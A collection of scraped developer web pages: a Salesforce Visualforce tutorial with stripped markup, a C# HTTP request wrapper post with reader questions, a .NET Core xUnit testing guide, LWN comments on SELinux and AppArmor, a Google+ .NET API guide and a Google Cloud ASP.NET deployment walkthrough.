<apex: <apex:pageBlock We are viewing the Contacts for this <b>{!account.name}</b> Account. </apex:pageBlock> <apex:pageBlock <apex:pageBlockTable <apex:column <apex:column <apex:column <apex:column </apex:pageBlockTable> </apex:pageBlock> </apex:page>

Create the button called “ContactsForAccount” on the Account object and override the above Visualforce page with this button.

Explanation:

- The starting tag for a Visualforce page is <apex:page>, and this page follows the standard object Account.
- We form a new page block which gives the user name and the account holder name.
- We form a second page block with the title Contacts.
- We then retrieve the contact fields through the account, and the field labels are shown as column headers.

Visualforce Scenario 4: Create the Visualforce page with the following code.
This is an example of a custom controller.

Page Name="PageReference"

<apex:page
<apex:form>
<apex:pageBlock
<apex:pageBlockSection
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
</apex:pageBlockSection>
<apex:pageBlockSection
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
</apex:pageBlockSection>
<apex:pageBlockButtons>
<apex:commandButton
</apex:pageBlockButtons>
</apex:pageBlock>
</apex:form>
</apex:page>

My custom controller class:

public class MyCustomController {
    public Account acc;

    public MyCustomController() {
        acc = [select id, Name, Phone, Industry, Website, Active__c, Rating,
               BillingCity, Description, Fax, ShippingCity, AnnualRevenue,
               BillingCountry, ShippingCountry
               from Account
               where id = :ApexPages.currentPage().getParameters().get('Id')];
    }

    public Account getAccount() {
        return acc;
    }

    public PageReference saveMethod() {
        update acc;
        PageReference pageRef = new ApexPages.StandardController(acc).view();
        return pageRef;
    }
}

Create a "Detail Page Link" with the name "PageReference" on the Account object. While creating it, select "Execute JavaScript" as the behavior and "OnClick JavaScript" as the Content Source:

parent.window.location.replace("/apex/PageReference?id={!Account.id}");

Add the PageReference link to the Account layout. Update the field values and then click on the "Save the Page" button in the above window; we will get the standard Account detail page.

Visualforce Scenario 5: Create the Visualforce page with the following code. This is an example of a custom controller.
Page Name="WithoutPageReference"

<apex:page
<apex:form>
<apex:pageBlock
<apex:pageBlockButtons>
<apex:commandButton
</apex:pageBlockButtons>
<apex:pageBlockSection
<apex:inputField
<apex:inputField
<apex:inputField
<apex:inputField
</apex:pageBlockSection>
</apex:pageBlock>
</apex:form>
</apex:page>

My second controller class:

public class MySecondController {
    public Opportunity opp;

    public MySecondController() {
        opp = [select id, Name, DeliveryInstallationStatus__c, TrackingNumber__c, CloseDate
               from Opportunity
               where id = :ApexPages.currentPage().getParameters().get('Id')];
    }

    public Opportunity getOpportunity() {
        return opp;
    }

    public PageReference saveMethod() {
        update opp;
        return null;
    }
}

Create a "Detail Page Link" with the name "WithoutPageReference" on the Opportunity object. While creating it, select "Execute JavaScript" as the behavior and "OnClick JavaScript" as the Content Source. Use the following JavaScript to call the Visualforce page:

parent.window.location.replace("/apex/WithoutPageReference?id={!Opportunity.Id}");

Go to the Opportunity detail page and click on the WithoutPageReference link. Update the field values in the window that opens and click on the "Save The Opportunity" button. The values will be updated, but the page redirects to itself rather than to the Opportunity detail page.

Visualforce Scenario 6: Earlier we wrote a trigger so that when a Contact is created with the Contact Relationship checkbox checked, a Contact Relationship is created for that Contact automatically. Create the Visualforce page with the following code. Create a button called "Create Multiple Contact Relationship" on the Account object; once we click this button on an Account detail page, the Contacts which don't have Contact Relationships will be listed.
Visualforce code:

Page Name="ContactRelationShips"

<apex:
<apex:form>
<apex:pageBlock>
<apex:sectionHeader
<center>
<apex:commandButton
</center>
<apex:pageBlockTable
<apex:
<apex:facet>Action</apex:facet>
<apex:inputCheckbox>
</apex:inputCheckbox>
</apex:column>
<apex:column>
<apex:facet>Contact Name</apex:facet>
<apex:outputText
</apex:column>
<apex:column>
<apex:facet>Title</apex:facet>
<apex:outputText
</apex:column>
<apex:column>
<apex:facet>Email</apex:facet>
<apex:outputText
</apex:column>
<apex:column>
<apex:facet>Phone</apex:facet>
<apex:outputText
</apex:column>
</apex:pageBlockTable>
</apex:pageBlock>
</apex:form>
</apex:page>

MultipleContactRelationships class:

public with sharing class MultipleContactRelationships {

    public MultipleContactRelationships(ApexPages.StandardController controller) {
    }

    public List<Contact> ContactList {get; set;}

    public List<Contact> getConres() {
        Contact c = new Contact();
        ContactList = [select id, Name, Title, Email, Phone
                       from Contact
                       where Accountid = :ApexPages.currentPage().getParameters().get('id')
                       and Contact_Relationship__c = true];
        system.debug('********' + ContactList);
        return ContactList;
    }
}

Button creation: Create the button called "Create Multiple Contact Relationship" on the Account object with the following JavaScript:

parent.window.location.replace("/apex/ContactRelationShips?id={!Account.id}");

The following window will come up when we click on "Create Multiple Contact Relationship" in the above window.
https://tekslate.com/tags-used-create-visualforce-pages
In several applications, it's required to make requests (either GET or POST) to a web resource and process the data received from the server within the script itself. In the popular scripting language PHP, the Guzzle library helps to do such work perfectly. Those who are using C# and the .NET platform for developing web applications also need such facilities. Luckily, there are already some built-in classes in the .NET Framework that give native support. However, this native support for performing HTTP requests in C# is quite raw and can be generalized into a wrapper. I will provide a C# code sample of a complete wrapper class that you can reuse in your application with minimal customization.

Update: At the time of writing this article, I didn't find any other useful library, which is why I created this very basic/simple wrapper class. However, there is now a more advanced way to perform such operations using the RestSharp client. You can refer to that if you are about to perform complete HTTP requests. Still, the following simple class can help you understand the internal mechanism of how a request is constructed.

As I am going to provide a solution already, I am not going to explain the internal mechanism in detail. But feel free to explore the class if you want; it's pretty straightforward. I will show how to use the class and what format to follow when passing parameters. Alternatively, you can fork a copy from GitHub. The GitHub URL for this is:

Here you go with the complete code of the class (it uses the System, System.IO, System.Net, and System.Text namespaces):

using System;
using System.IO;
using System.Net;
using System.Text;

public class MyWebRequest
{
    private WebRequest request;
    private Stream dataStream;

    private string status;

    public String Status
    {
        get { return status; }
        set { status = value; }
    }

    public MyWebRequest(string url)
    {
        // Create a request using a URL that can receive a post.
        request = WebRequest.Create(url);
    }

    public MyWebRequest(string url, string method)
        : this(url)
    {
        if (method.Equals("GET") || method.Equals("POST"))
        {
            // Set the Method property of the request to GET or POST.
            request.Method = method;
        }
        else
        {
            throw new Exception("Invalid Method Type");
        }
    }

    public MyWebRequest(string url, string method, string data)
        : this(url, method)
    {
        // Create POST data and convert it to a byte array.
        string postData = data;
        byte[] byteArray = Encoding.UTF8.GetBytes(postData);

        // Set the ContentType property of the WebRequest.
        request.ContentType = "application/x-www-form-urlencoded";

        // Set the ContentLength property of the WebRequest.
        request.ContentLength = byteArray.Length;

        // Get the request stream, write the data to it, and close the stream.
        dataStream = request.GetRequestStream();
        dataStream.Write(byteArray, 0, byteArray.Length);
        dataStream.Close();
    }

    public string GetResponse()
    {
        // Get the original response.
        WebResponse response = request.GetResponse();

        this.Status = ((HttpWebResponse)response).StatusDescription;

        // Get the stream containing all content returned by the requested server.
        dataStream = response.GetResponseStream();

        // Open the stream using a StreamReader for easy access.
        StreamReader reader = new StreamReader(dataStream);

        // Read the content fully up to the end.
        string responseFromServer = reader.ReadToEnd();

        // Clean up the streams.
        reader.Close();
        dataStream.Close();
        response.Close();

        return responseFromServer;
    }
}

Basic Understanding Of This Class:

So, as you can see, the constructor comes in three different forms. You must pass the URL. By default the method is set to 'GET'. If you need to use the 'POST' method, pass it as the second parameter. The third parameter is for the 'data' that you may want to post to the server. The "GetResponse()" method will return the result in plain text format, so you need to process it as per your need. You can check whether any error occurred by using the "Status" property.

Just to clear up a confusion from many readers: it doesn't matter what kind of application you are working on, desktop application or ASP.NET web application, this class can be used in the same way for both types. Cheers!

Using This C# HTTP Request Class:

Implementing this class in an application is quite easy. First you create an instance of the class and then call a parameterless function to receive the response data. So, everything you need to feed it goes into the constructor call. There are three different types of constructor you can call.
The first, with one parameter (the web resource URL), simply downloads the data of the web page. The second, with two parameters (URL and method), lets you set the request type explicitly ("GET" or "POST", as needed). The third has three parameters (URL, method, and data).

For the url parameter, you must use a valid URI. For the method parameter, you have to use "GET" or "POST" depending on your request type. The third parameter should be URL-encoded data in this format: "variable1=value1&variable2=value2"

Here is a sample code snippet to make a complete request and get the string response:

//create the constructor with post type and few data
MyWebRequest myRequest = new MyWebRequest("", "POST", "a=value1&b=value2");

//show the response string on the console screen.
Console.WriteLine(myRequest.GetResponse());

This is it. Let me know if you are having any complexities here, and also if you want any more features added. I will try to do so. Happy coding 😀

I am trying to make calls to pages in the Facebook Graph API and retrieve them in my application. Do you suggest I install the Facebook C# SDK or use the code above for access?
Kind regards, Naim

Depends on the specific domain. If you are creating a fully Facebook-based application, then I will suggest you use the Facebook SDK. For simple usage (and to understand better how they work), you can go with the manual approaches that I have discussed in a few posts. Hope this helps.

i need how to connect with user and server

Hi Rana, thanks for your post. I had an error at line 57: dataStream = request.GetRequestStream(); The error msg is "Cannot send a content-body with this verb-type". Is there anything extra I need to do?
Thanks, warm regards, Phil

Enter the method name as "POST". The GET method does not work; it gives the error msg "Cannot send a content-body with this verb-type".

What if I want to call a JavaScript function on a page?
like: httpget(uri, "javascript:ChangeAcc()"); happy programming

Modification to make the GET request work:

public MyWebRequest(string url, string method, string data)
    : this(url, method)
{
    if (request.Method == "POST")
    {
        // Create POST data and convert it to a byte array.
        byte[] byteArray = Encoding.UTF8.GetBytes(data);
        //();
    }
    else
    {
        String finalUrl = string.Format("{0}{1}", url, "?" + data);
        request = WebRequest.Create(finalUrl);
        WebResponse response = request.GetResponse();
        //Now, we read the response (the string), and output it.
        dataStream = response.GetResponseStream();
    }
}

thank you

Dear Sir, I have 2 doubts:
1. I am not sure whether I should use the same URL or replace it with my own domain URL, which I don't have.
2. I am getting an error at the line below:

public string GetResponse() {
    // Get the original response.
    WebResponse response = request.GetResponse();

The error is an unhandled WebException: "The remote server returned an error: (405) Method Not Allowed." Kindly help me to resolve it.

How would you implement it using a username and password?

how do i close the connections immediately? i am getting the 4 instances ….

It is not necessary to close a stream when you've already called Close() on its assigned StreamWriter/Reader; it does it for you automatically. It's also good practice to use the "using" keyword when working with streams. For instance, if we have a stream 's' and a string 'stuff':

using (StreamWriter sw = new StreamWriter(s))
{
    sw.Write(stuff);
}

Once the end of the block is reached, the StreamWriter object gets disposed, calling Close() on itself before that happens and in turn closing the underlying stream as well. I'm using the following convenience methods to write to and read from streams when working with HTTP requests; feel free to use them yourself.
public static void StringToStream(Stream stream, string content)
{
    using (StreamWriter writer = new StreamWriter(stream))
    {
        writer.Write(content);
    }
}

public static string StringFromStream(Stream stream)
{
    string content;
    using (StreamReader reader = new StreamReader(stream))
    {
        content = reader.ReadToEnd();
    }
    return content;
}

How do I post and retrieve data to/from a remote MS SQL database using this HTTP approach?

Hello. I'm getting: Cannot implicitly convert type 'MyWebRequest' to 'System.Net.WebRequest', on:

WebRequest myRequest = new MyWebRequest("", "POST", "a=value1&b=value2");

It would be very helpful to see which 'using' statements are needed in both the example code and the class that you created. I find so many examples where people give code but do not give the using statements needed to know which areas of the .NET library are being called. This would be extremely helpful for people who are just starting out and don't have common libraries or using statements memorized. Thank you

Can you please elaborate how to run this program in VS? Also, is it necessary to install IIS to run this program?

You can run it in either a desktop application or a web application. This will help in cases where your application itself needs to make HTTP GET or POST requests to other external web resources and process the response. You don't need to install IIS.

Hi, I need to receive a request from another website; they send it to me via POST, but I don't know how to get it in my page. They send 2 parameters, like this:

notificationCode=766B9C-AD4B044B04DA-77742F5FA653-E1AB24
notificationType=transaction

I'm using C#. What do I put in Page_Load to get these parameters? Thanks for all help.

Hi, you can handle them in the same way you handle your own site's GET/POST requests. Just grab 'Request.Params["SomeID"]' or Request.QueryString("parameter1") in your C# code, depending on what type of HTTP request they are sending to your application. Hope this helps.
Hello. When I am using this code I am getting a NULL value in return when I access my PHP file directly from the browser, and even in the OUTPUT window of VS it displays just the value of 'a', that is "Value1", nothing else. My client-side application is in C# using help from your code and my server-side application is in PHP, and the statement I am using in my PHP file is

And one more question: I would like to post data that the client enters in a TextBox, and I tried to put that in the query but failed. So it would be really appreciated if you could help me with that as well, along with the NULL return value.

Thanks for your code. It's very useful.

Thanks Ali, very useful.

Very useful! What a pain the default WebRequest is with POST parameters… Thank you very much!

Nice article. As per my research on this topic, I have seen that we can address the security concerns regarding GET requests by using the HTTPS protocol.

I want to get a response from this URL: "
Note: this is the original web address, but I got this error message: "The operation has timed out". Could you tell me if there is something wrong with my code? Here is my code:

//create the constructor with post type and few data
MyWebRequest myRequest = new MyWebRequest("", "POST", "Domain=HASANUDDIN.INFO&ApiKey=testapi&Password=testpass");

//show the response string on the console screen.
Console.WriteLine(myRequest.GetResponse());
Hi, How could you use this to replace this Curl statement curl -H “X-Auth-User: bryanoliver” -H “X-Auth-Expires: 1406485297″ -H “X-Auth-Key: 946ddd08f5fbcb3ddb0c91e3785f0630″ “-H” “Accept: application/xml” “″ {“The remote server returned an error: (500) Internal Server Error.”} Dear Ali Ahsan, How can I use this in a multiple call? To give you the idea. I created a 2 method that calls different data. For instance: checkExisting_data() – for getting hours list addComboList() – for getting projects list But when I put this both on the Form Load, only one method is working and the other is not but when I commented the first one the second method works. So i guess there is nothing wrong with my method //Sample Code Please advise! Thank you in advance This script does not RUN.. any ideas. also i want to know how i can get the URL connect to display TRUE as in connection is TRUE . That way i know the code works and POST. THis is what i have but it does not work. I want to POST to URL with the STRING like:. can anyone help.? Code: Great class man! really simple and got it working in a second! Thanks for your efforts!
http://codesamplez.com/programming/http-request-c-sharp
Unit Testing in .NET Core using dotnet test

By Steve Smith and Bill Wagner

View or download sample code

Note: This topic applies to .NET Core 1.0.

Creating the Projects

Writing Libraries with Cross Platform Tools has information on organizing multi-project solutions for both the source and the tests. This article follows those conventions. The final project structure will be something like this:

/unit-testing-using-dotnet-test
|__global.json
|__/src
   |__/PrimeService
      |__Source Files
      |__project.json
|__/test
   |__/PrimeService.Tests
      |__Test Files
      |__project.json

In the root directory, you'll need to create a global.json that contains the names of your src and test directories:

{
  "projects": [
    "src",
    "test"
  ]
}

Creating the source project

Then, in the src directory, create the PrimeService directory. CD into that directory, and run dotnet new -t lib to create the source project. Rename Library.cs as PrimeService.cs. To use test-driven development (TDD), you'll create a failing implementation of the PrimeService class:

using System;

namespace Prime.Services
{
    public class PrimeService
    {
        public bool IsPrime(int candidate)
        {
            throw new NotImplementedException("Please create a test first");
        }
    }
}

Creating the test project

Next, cd into the 'test' directory, and create the PrimeService.Tests directory. CD into the PrimeService.Tests directory and create a new project using dotnet new -t xunittest. dotnet new -t xunittest creates a test project that uses xunit as the test library.

The generated template configures the test runner at the root of project.json:

{
  "version": "1.0.0-*",
  "testRunner": "xunit",
  // ...
}

The template also sets the framework node to use netcoreapp1.0, and includes the required imports to get xUnit.net to work with .NET Core RTM:

"frameworks": {
  "netcoreapp1.0": {
    "imports": [
      "dotnet54",
      "portable-net45+win8"
    ]
  }
}

The test project requires other packages to create and run unit tests. dotnet new added xunit, and the xunit runner.
You need to add the PrimeService package as another dependency to the project:

"dependencies": {
  "xunit": "2.1.0",
  "dotnet-test-xunit": "1.0.0-rc2-192208-24",
  "PrimeService": {
    "target": "project"
  }
}

Notice that the PrimeService project does not include any directory path information. Because you created the project structure to match the expected organization of src and test, and the global.json file indicates that, the build system will find the correct location for the project. You add the "target": "project" element to inform NuGet that it should look in project directories, not in the NuGet feed. Without this key, you might download a package with the same name as your internal library.

You can see the entire file in the samples repository on GitHub.

After this initial structure is in place, you can write your first test. Once you verify that first unit test, everything is configured and should run smoothly as you add features and tests.

Creating the first test

The TDD approach calls for writing one failing test, then making it pass, then repeating the process. So, let's write that one failing test. Remove program.cs from the PrimeService.Tests directory, and create a new C# file with the first test. The [Fact] attribute denotes a method as a single test.

Save this file, then run dotnet build to build the test project. If you have not already built the PrimeService project, the build system will detect that and build it because it is a dependency of the test project.

Now, execute dotnet test to run the tests from the console. The xunit test runner has the program entry point to run your tests from the console. dotnet test starts the test runner, and provides a command line argument to the test runner indicating the assembly that contains your tests.

Your test fails. You haven't created the implementation yet.
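The first test itself is elided above; it might look like the sketch below. In the real project it would be an xUnit method marked [Fact] with an Assert.False call; here a plain Main stands in for the test runner so the sketch is self-contained, and the test-method name is an assumption. Run against the not-yet-implemented service, it reproduces exactly the failure the tutorial describes.

```csharp
using System;

// The failing implementation from the source project, unchanged.
public class PrimeService
{
    public bool IsPrime(int candidate)
    {
        throw new NotImplementedException("Please create a test first");
    }
}

class PrimeServiceTests
{
    // In the xUnit project this would be:
    //   [Fact]
    //   public void ReturnsFalseGivenValueOf1()
    //   {
    //       Assert.False(new PrimeService().IsPrime(1));
    //   }
    static void Main()
    {
        var primeService = new PrimeService();
        try
        {
            bool result = primeService.IsPrime(1);
            Console.WriteLine(result ? "test failed: expected false" : "test passed");
        }
        catch (NotImplementedException)
        {
            // This is what the first `dotnet test` run reports:
            // no implementation exists yet, so the test fails.
            Console.WriteLine("test failed: NotImplementedException");
        }
    }
}
```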
Write the simplest code to make this one test pass:

public bool IsPrime(int candidate)
{
    if (candidate == 1)
    {
        return false;
    }
    throw new NotImplementedException("Please create a test first");
}

Adding More Features

Now that you've made one test pass, it's time to write more. There are a few other simple cases for prime numbers: 0, -1. You could add those as new tests with the [Fact] attribute, but that quickly becomes tedious. There are other xunit attributes that enable you to write a suite of similar tests. A Theory represents a suite of tests that execute the same code but have different input arguments. You can use the [InlineData] attribute to specify values for those inputs.

Instead of creating new tests, leverage these two attributes to create a single theory that tests some values less than 2, and you'll see that two of these tests fail. You can make them pass by changing the service. You need to change the if clause at the beginning of the method:

if (candidate < 2)

Now, these tests all pass. You continue to iterate by adding more tests, more theories, and more code in the main library. You'll quickly end up with the finished version of the tests and the complete implementation of the library.

You've built a small library and a set of unit tests for that library. You've structured this solution so that adding new packages and tests will be seamless, and you can concentrate on the problem at hand. The tools will run automatically.

Tip: On the Windows platform you can use MSTest. Find out more in the Using MSTest on Windows document.
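The article never shows the finished IsPrime, so the sketch below is an assumption of what the iteration converges on: the candidate < 2 guard from the last step plus a standard trial-division loop. The Main method exercises the same boundary cases the [Theory] covers, plus a couple of real primes.

```csharp
using System;

public class PrimeService
{
    // Trial-division primality check; candidates below 2 are not prime,
    // and any candidate divisible by a value up to its square root is composite.
    public bool IsPrime(int candidate)
    {
        if (candidate < 2)
        {
            return false;
        }
        for (int divisor = 2; divisor * divisor <= candidate; divisor++)
        {
            if (candidate % divisor == 0)
            {
                return false;
            }
        }
        return true;
    }
}

class Program
{
    static void Main()
    {
        var service = new PrimeService();
        // The values-less-than-2 cases from the theory, then known results.
        Console.WriteLine(service.IsPrime(-1)); // False
        Console.WriteLine(service.IsPrime(0));  // False
        Console.WriteLine(service.IsPrime(1));  // False
        Console.WriteLine(service.IsPrime(2));  // True
        Console.WriteLine(service.IsPrime(9));  // False
        Console.WriteLine(service.IsPrime(13)); // True
    }
}
```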
https://docs.microsoft.com/en-us/dotnet/articles/core/testing/unit-testing-with-dotnet-test
It's notable that the SELinux developers have been appearing to say that there *was* a way to implement AppArmor atop SELinux, and indeed everything else security-related one could possibly imagine that was any use to anyone, and that therefore LSM was unnecessary. It always struck me as the sort of thing that was *bound* to be proved wrong.

Kernel Summit 2006: Security
Posted Jul 19, 2006 11:45 UTC (Wed) by Method (guest, #26150) [Link]

SELinux is implemented under a framework called Flask. It abstracts the details of the underlying hooks from the security server (which just cares about giving the requested decision).

Kernel Summit 2006: Security
Posted Jul 20, 2006 23:39 UTC (Thu) by crispin (guest, #2073) [Link]

"... the Flask architecture within.

Kernel Summit 2006: Security
Posted Jul 21, 2006 0:55 UTC (Fri) by Method (guest, #26150) [Link]

You are right,

It's odd that all the points you raise in this comment are ones which Mike Hearn comprehensively demolished in his comment to the very post you link to.

Kernel Summit 2006: Security
Posted Jul 22, 2006 19:07 UTC (Sat) by Method (guest, #26150) [Link]

Comprehensively? Hardly.

Kernel Summit 2006: Security
Posted Jul 24, 2006 16:13 UTC (Mon) by crispin (guest, #2073) [Link]

... so let's take just one argument at a time: "paths are ambiguous".

Kernel Summit 2006: Security
Posted Jul 24, 2006 17:01 UTC (Mon) by Method (guest, #26150) [Link]

I'm actually not going to go through this in LWN comments, it's very unproductive. However, you had one entirely false statement in your comment:

Kernel Summit 2006: Security
Posted Jul 24, 2006 20:12 UTC (Mon) by nix (subscriber, #2304) [Link]

It doesn't take a genius to grasp that AppArmor counters this by banning namespace changes (other than chroot(), which can be handled) for covered applications.
Yes, this means no fancy shared subtree hacks can be carried out by apps that are *actually covered*, but since shared subtree hacks are often done by login PAM modules, and that's not going to be stuff you're going to protect with AppArmor...

> The great thing about this is that, for example, your bind

Kernel Summit 2006: Security
Posted Jul 25, 2006 21:04 UTC (Tue) by dlang (subscriber, #313) [Link]

And the reply to this from AppArmor was that they are enhancing AA to look at the path to the file, looking through the namespace mappings.
https://lwn.net/Articles/191858/
Google has always impressed me with the quality of their API libraries, allowing us to interface with their products in a somewhat straightforward manner. In the past, I've used a couple of Google's APIs for implementing YouTube videos or Checkout merchant features within my own sites. What makes life even easier is that the APIs are available in my native programming framework - .NET.

Google was quite slow in launching an official API upon Google+'s initial release, and even though unofficial APIs were available, I thought it would be best to wait until an official release was made. I've been playing around with Google's .NET API for a couple of weeks now and only just had the time to blog about it. I am hoping to make this beginners guide a three-part series:

- Profile Data
- User Posts
- User's +1's

So let's get to it! Today, I shall be showing you the basic API principles to get you started in retrieving data from your own Google+ profile.

Prerequisites

Before we can start thinking about coding our page to retrieve profile information, it's a requirement to register your application by going to:. Providing you already have an account with Google (and who hasn't?), this shouldn't be a problem. If you don't see the page (below), a new API Project needs to be created. Only the Client ID, Client Secret and API Key will be used in our code, allowing us to carry out API requests from our custom application.

Next, download the Google Plus .NET Client. My own preference is to use the Binary release containing the compiled .NET Google Client API and all DLLs for all supported services.

Building A Custom Profile Page

- Create a new Visual Studio Web Application.
- Unzip the Binary Zip file containing all Google service DLLs.
Find and reference the following DLLs in your project:

- Google.Apis.dll
- Google.Apis.Authentication.OAuth2.dll
- Google.Apis.Plus.v1.dll

Copy and paste the following front-end HTML code:

<h2>About Me</h2>
<br />
<table>
  <tr>
    <td valign="top">
      <asp:Image</asp:Image>
    </td>
    <td valign="top">
      <strong>Name:</strong>
      <asp:Label</asp:Label>
      <br /><br />
      <strong>About Me:</strong>
      <asp:Label</asp:Label>
      <br />
      <strong>Gender:</strong>
      <asp:Label</asp:Label>
      <br /><br />
      <strong>Education/Employment:</strong>
      <asp:Literal</asp:Literal>
    </td>
  </tr>
  <tr>
    <td colspan="2" valign="middle">
      <asp:HyperLinkGo to my Google+ profile</asp:HyperLink>
    </td>
  </tr>
</table>

Copy and paste the following C# code:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text;
using Google.Apis.Authentication.OAuth2.DotNetOpenAuth;
using Google.Apis.Authentication.OAuth2;
using Google.Apis.Plus.v1;
using Google.Apis.Plus.v1.Data;

namespace GooglePlusAPITest
{
    public partial class About : System.Web.UI.Page
    {
        private string ProfileID = "100405991313749888253"; // My public Profile ID
        private string GoogleIdentifier = "<GoogleIdentifier>";
        private string GoogleSecret = "<GoogleSecret>";
        private string GoogleKey = "<GoogleKey>";

        protected void Page_Load(object sender, EventArgs e)
        {
            if (!Page.IsPostBack)
                GetGooglePlusProfile();
        }

        private void GetGooglePlusProfile()
        {
            var provider = new NativeApplicationClient(GoogleAuthenticationServer.Description);
            provider.ClientIdentifier = GoogleIdentifier;
            provider.ClientSecret = GoogleSecret;

            var service = new PlusService();
            service.Key = GoogleKey;

            var profile = service.People.Get(ProfileID).Fetch();

            // Profile Name
            DisplayName.Text = profile.DisplayName;

            // About me
            AboutMe.Text = profile.AboutMe;

            // Gender
            Gender.Text = profile.Gender;

            // Profile Image
            ProfileImage.ImageUrl = profile.Image.Url;

            // Education/Employment
            StringBuilder workHTML = new StringBuilder();
            workHTML.Append("<ul>");
            foreach (Person.OrganizationsData work in profile.Organizations.ToList())
            {
                workHTML.AppendFormat("<li>{0} ({1})", work.Title, work.Name);
            }
            workHTML.Append("</ul>");
            Work.Text = workHTML.ToString();

            // Link to Google+ profile
            GotoProfileButton.NavigateUrl = profile.Url;
        }
    }
}

Once completed, the page should resemble something like this:

I think you can all agree this example was pretty straightforward. We are simply using the people.get method, which translates into the following HTTP request:

Unless you really want to display my profile information on your site (who wouldn't!), you can keep the code as it is. But you have the flexibility to change the "ProfileID" variable to an ID of your own choice. To find your Profile ID, read: How Do I Find My Google Plus User ID?
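Under the hood, service.People.Get(ProfileID).Fetch() issues a simple HTTP GET. The sketch below builds that request URL by hand; the endpoint path is an assumption based on the plus/v1 REST API, and "YOUR-API-KEY" is a placeholder for the API Key obtained during registration.

```csharp
using System;

class PeopleGetUrl
{
    // The client library call service.People.Get(profileId).Fetch()
    // ultimately issues a GET against a REST endpoint like the one
    // constructed here (path assumed from the plus/v1 people.get method).
    static string BuildPeopleGetUrl(string profileId, string apiKey)
    {
        return string.Format(
            "https://www.googleapis.com/plus/v1/people/{0}?key={1}",
            Uri.EscapeDataString(profileId),
            Uri.EscapeDataString(apiKey));
    }

    static void Main()
    {
        // Same profile ID as the sample page; the key is a placeholder.
        string url = BuildPeopleGetUrl("100405991313749888253", "YOUR-API-KEY");
        Console.WriteLine(url);
    }
}
```

Seeing the raw URL makes it clear why only the API Key is needed for this call: public profile data requires no OAuth token, just a registered key.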
https://www.surinderbhomra.com/Blog/2012/04/10/Beginners-Guide-To-Using-Google-Plus-NET-API-Part-1-Profile-Data
This tutorial describes how to use Visual Studio to deploy an ASP.NET Framework-based Hello World app from a Windows development environment to a Compute Engine instance running Windows Server 2016. This tutorial assumes that you have the Visual Studio 2017 IDE for Windows or later installed and are familiar with the .NET Framework and the C# language.

You may also want to review our Quickstart for .NET in the App Engine Flexible Environment for the following reasons:

- You want to deploy an ASP.NET Core-based Hello World app.
- You want to deploy an app to the Beta App Engine Flexible environment, which provides automatic up and down scaling, as well as load balancing.
- You want to deploy a Hello World app from the command line without using Visual Studio.

This is part of the Getting Started with .NET on GCP series. After you complete the prerequisites listed under Before you begin, the tutorial takes about 15 minutes to complete.

Before you begin

- Create a project in the Google Cloud Platform Console. If you haven't already created a project, create one now. Projects enable you to manage all Google Cloud Platform resources for your app, including deployment, access control, billing, and services.
  - Open the GCP Console.
  - In the drop-down menu at the top, select Create a project.
  - Click Show advanced options.
  - Give your project a name.
  - Make a note of the project ID, which might be different from the project name. The project ID is used in commands and in configurations.
- Enable billing for your project, and sign up for a free trial. If you haven't already enabled billing for your project, enable billing now, and sign up for a free trial. Enabling billing allows the app to consume billable resources such as running instances and storing data. During your free trial period, you won't be billed for any services.
Download and run the app

We've created a simple Hello World app using .NET so you can quickly get a feel for deploying an app to Google Cloud Platform (GCP). After you've completed the prerequisites, you can download and deploy the Hello World sample app. This section guides you through getting the code and running the app locally.

Get the Hello World app

Download the sample as a zip file and extract it. Alternatively, you can clone the git repository:

$ git clone

Run the app on your local computer

- To open the app in Visual Studio 2017, double-click aspnet\1-hello-world\1-hello-world.sln.
- In Visual Studio, press F5 to build and run the app. You can see the Hello, World! message from the sample app displayed in the page. This page is delivered by a web server running on your computer.
- When you are ready to move forward, press Shift-F5 to stop the app.

Hello World code review

The code is a simple ASP.NET app:

```csharp
/// <summary>
/// The simplest possible HTTP Handler that just returns "Hello World."
/// </summary>
public class HelloWorldHandler : HttpMessageHandler
{
    protected override Task<HttpResponseMessage> SendAsync(
        HttpRequestMessage request, CancellationToken cancellationToken)
    {
        return Task.FromResult(new HttpResponseMessage()
        {
            Content = new ByteArrayContent(Encoding.UTF8.GetBytes("Hello World."))
        });
    }
}

public static void Register(HttpConfiguration config)
{
    var emptyDictionary = new HttpRouteValueDictionary();

    // Add our one HttpMessageHandler to the root path.
    config.Routes.MapHttpRoute("index", "", emptyDictionary, emptyDictionary,
        new HelloWorldHandler());
}
```

Running Hello World on GCP

Create and configure a new Compute Engine instance

First, use Google Cloud Platform Marketplace to create a new Compute Engine instance that has Windows Server 2016, Microsoft IIS, ASP.NET, and SQL Express preinstalled.

- In the GCP Console, go to the GCP Marketplace ASP.NET Framework page.
- Set your deployment name and preferred Compute Engine zone.
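If you prefer the command line over the GCP Marketplace page, a Windows Server 2016 instance can also be created with gcloud. This is a sketch only: the instance name, zone, and machine type are arbitrary placeholder choices, and unlike the Marketplace image, the base `windows-2016` image does not come with IIS, ASP.NET, and SQL Express preinstalled, so you would need to add those roles yourself.

```shell
# Create a Windows Server 2016 VM from the public windows-cloud image family.
gcloud compute instances create my-aspnet-vm \
    --zone=us-central1-a \
    --machine-type=n1-standard-2 \
    --image-family=windows-2016 \
    --image-project=windows-cloud

# Generate a Windows username and password for the instance
# (the CLI counterpart of "Manage Windows credentials" in Cloud Explorer).
gcloud compute reset-windows-password my-aspnet-vm \
    --zone=us-central1-a \
    --user=MYUSER
```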
To deploy the Compute Engine instance, click Deploy.

Install Cloud Tools for Visual Studio

To install Cloud Tools for Visual Studio, complete the following installation process:

- In Visual Studio, go to Tools > Extensions and Updates.
- In the left pane, click the Online tab.
- Click Download and follow the prompts.
- To load the new extension, restart Visual Studio.

Configure Cloud Tools for Visual Studio to use your account

- In Visual Studio, launch Cloud Explorer by going to Tools > Google Cloud Tools > Show Google Cloud Explorer.
- To access GCP resources, add your Google account: click Select or Create Account, and then click Add account.

Add a default Windows user to your new Compute Engine instance

- In Cloud Explorer, select the newly created project and expand Compute Engine.
- Right-click the VM instance that you created with GCP Marketplace and select Manage Windows credentials.
- Click Add credentials.
- Enter a username.
- Select Create a password for me and click Save.
- When prompted to reset the password for [YOUR USERNAME] on the instance [INSTANCE YOU CREATED], click Reset.
- To close the Password window, click the Close button.
- To close the Windows Credentials window, click the Close button.

Deploy the app to your Windows instance

- In the Visual Studio Solution Explorer pane, right-click your app and click Publish to Google Cloud.
- In the Publish dialog box, click Compute Engine.
- To build and deploy the sample app, click Publish.

